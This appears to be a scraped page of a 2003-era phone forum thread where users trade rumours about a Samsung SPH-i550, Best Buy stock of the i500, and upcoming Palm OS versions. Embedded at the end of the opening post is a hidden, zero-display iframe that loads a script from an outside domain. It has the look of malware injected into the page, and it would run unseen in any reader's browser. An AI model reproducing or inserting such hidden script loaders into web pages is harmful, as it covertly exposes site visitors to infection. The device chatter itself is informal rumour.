+ Reply to Thread
Page 1 of 7 1 2 3 4 5 ... LastLast

SPH-i550?????

I went to my local Best Buy and was told by the gal there that they would not be carrying the i500 at all because demand was too great and they can't keep them in. (odd) They also stopped carrying the i330. The store is right near Microsoft's campus so I suppose all the techies in the area are gobbling them up. Another employee was there and told me they *would* be carrying the i550 around October 1st. He didn't really remember all the difference other than it would be faster @ web browsing. Anyone know anything about this model? Is it just a software upgrade or is it possible they have an external display, camera etc?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: SPH-i550?????

Originally posted by Dodin
    I went to my local Best Buy and was told by the gal there that they would not be carrying the i500 at all because demand was too great and they can't keep them in.
    Ok, that is definitely Dumb Sales Clerk Post of the Day.

agreed... the best buy clerk is wrong.. they are carrying it, and do have a sku for it in their system... 5462787

2nd, I don't think there is an I550... maybe the sGh-i500 which is the GSM version that has a few more bells and whistles over the sPh version.. .there is a thread here on that phone...
    old devices: I300, I330, I500
    current: I730

FWIW

I called my local Best Buy today, the guy told me that
    he didn't have any i500's yet. He really didn't expect
    them for another week or two. He was expecting
    a 'dummy' display before then.

Dave in Hickory, NC

BBH
    I went into a BB yesterday and the clerk told me that he didn't know when they would be in, but the midwest stores have a 1000 on order. He took my name, but said that there are already about 65 people on the list who want one.

Re: SPH-i550?????

Originally posted by Dodin
    I went to my local Best Buy and was told by the gal there that they would not be carrying the i500 at all because demand was too great and they can't keep them in.
    That's the same type of "informed" BB clerk that told me (a month ago) to wait for the better Samsung he'd seen - it would have a rotating screen, SD, etc (just like the Korean version of the SPH-i500) only to turnout he was talking about that lame A600 camera phone. Believe only what your eyes can see at BB.
    Dale2 - The "P" in PDA is for Personal. There is no "best" PDA.
    Sprint CDMA Treo 650 since 11/05

PHO
    Broward County Florida, "Home of the Hanging Chad"
    Rave did say that the next generation would be out sooner than we think, he also hinted it would be an i5-- something

but i doubt oct.

He was probably thinking of the Treo honestly, it has a faster processer.

its like the guy at the sprint store that told me they were getting the new PPC from toshiba, except he ment hitachi G1000

anyway, i'm hoping for the new samsung by spring

what do you think?

A
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

"Aaron the Research Dept."

I would think Spring is a rush UNLESS you're one of the great conspiracy theorists that say Sprint has dumped all the i500 they could out to the market to keep the buzz going until they can get the real deal in the pipeline for Christmas - how's that for rank rumor. It would explain the extreme lack of fanfare (and disarray) in the release of the SPH-i500; what does it hurt (except the feeling of a few early adopters who are already in love with it) and teh big roll out can placate naysayers (and compete with Treo 600 for market share).

A new samsung i5 by this fall?! I agree the slaes rep was probably referring to the SGH if anything. Furthermroe, if it took like 9 months for the SPH to get released, I can only imagine the length of time it would take for any new model to appear. However in about 6 months there will several PalmOS 6 devices out. It will be kinda annoying to still be using a OS 4.1 smartphone if you ask me...

Rave,

What do you have to say about this?

I'd be real sore if I went to pick up an i500 and found out the "i550" was out in October.

Josh
    I gave up on the free ipod. And where'd my smilies go?

th3_plague

boe
    Originally posted by gfunkmagic
    A new samsung i5 by this fall?! I agree the slaes rep was probably referring to the SGH if anything. Furthermroe, if it took like 9 months for the SPH to get released, I can only imagine the length of time it would take for any new model to appear. However in about 6 months there will several PalmOS 6 devices out. It will be kinda annoying to still be using a OS 4.1 smartphone if you ask me...
    I've heard about OS5 but nothing about OS 6 - can you post some links?

boe
    Originally posted by PHO
    Rave did say that the next generation would be out sooner than we think, he also hinted it would be an i5-- something
    but i doubt oct.

anyway, i'm hoping for the new samsung by spring

A
    The sooner the better. Maybe they'll make something like the SGH-i500 but make it compatable with Sprint or Verizon. Has anyone seen any linksfor the Korean version of the i500 that so many people are talking about?

I know among us geeks that's true, but to the average joe (or jane) out there, they don't care what the OS is, so long as it keeps the calendar and phone book, fetches email, and lets them browse a little. I'm the world's worst about having the latest/greatest, but this time I'm bowled over more by functionality (and, of course, cool looks) of this mighty midget. I railed on earlier that it was out of date; retro-techno; you name it. But now that I've used it for a week, all I can say is

MOST EXCELLENT (not bad for an old geek)
    Last edited by dstrauss; 08-01-2003 at 02:58 PM.

Originally posted by boe
    I've heard about OS5 but nothing about OS 6 - can you post some links?
    Here you go;

http://www.brighthand.com/article/RumorMill_Two_PalmOS6_Models_in_Nov

http://www.theinquirer.net/?article=10088

http://www.brighthand.com/article/RumorMill_PalmOS6_Coming_in_October

Furthermore, here's a new story today about three new possilbe Palm's coming out this fall:

http://www.brighthand.com/article/RumorMill_Palm_Preparing_3_Models_for_Fall

boe
    Here you go;
    l[/URL]
    Thanks - I hadn't read those. I like the protected memory. I've never needed to multitask with a palm before but it is possible that the phone and the palm may have needs I haven't used before.

Anyone have any photos of the Korean version of the I500?(m500 I think - not the palm m500)

The BB clerk told me he got the 550 info from a SPRINT rep so I doubt it was in reference to the SGH model.

I wouldn't doubt it if they released a batch of 500s as fast as they could and then tweaked the phone a bit releasing version 1.1 in other words the 550. I'm sure Samsung has people working on the next 2 or 3 versions as we speak.

Originally posted by th3_plague
    Rave,

What do you have to say about this?

I'd be real sore if I went to pick up an i500 and found out the "i550" was out in October.

Josh

You don't need to worry about i500 being replaced by the next gen modle so soon. That means the next gen model will not be coming out this year, period. However, there IS a next gen model being developed and I'm sure you can make logical guesses to what kind of features it will have (hint hint, SGH-i500).

People, we took this long with the SPH-i500. What chance is there that the SGH-i500s and next gens will come around so quick? I think you can fully enjoy the i500 for a year, and then, it will be choice time, again. You can choose to continue using the small and light i500, or go with more feaure rich but larger next gens.

A dilemma due to the short life-span of the OS 5 (compared to previous versions anyway), we'll have to worry about 6.0 devices in the market when we're coming out with 5.0 smartphones, sigh...

Originally posted by rave
    Rave, you rock man. Thanks for the info. I think you're right, we definitely put ourselves into a cycle of looking for "the next big thing".

Time to get off the wheel and enjoy the fruits of ... your ... labor!

Josh
    I gave up on the free ipod. And where'd my smilies go?

th3_plague

rave - love that avatar. I wounder how many of our younger members could even identify it.

Quite Convergent
    "rave - love that avatar"
    -----------------------------------------------------------
    Hey that's a LCD pay phone. This is the phone you won't remember.

+ Reply to Thread
Page 1 of 7 1 2 3 4 5 ... LastLast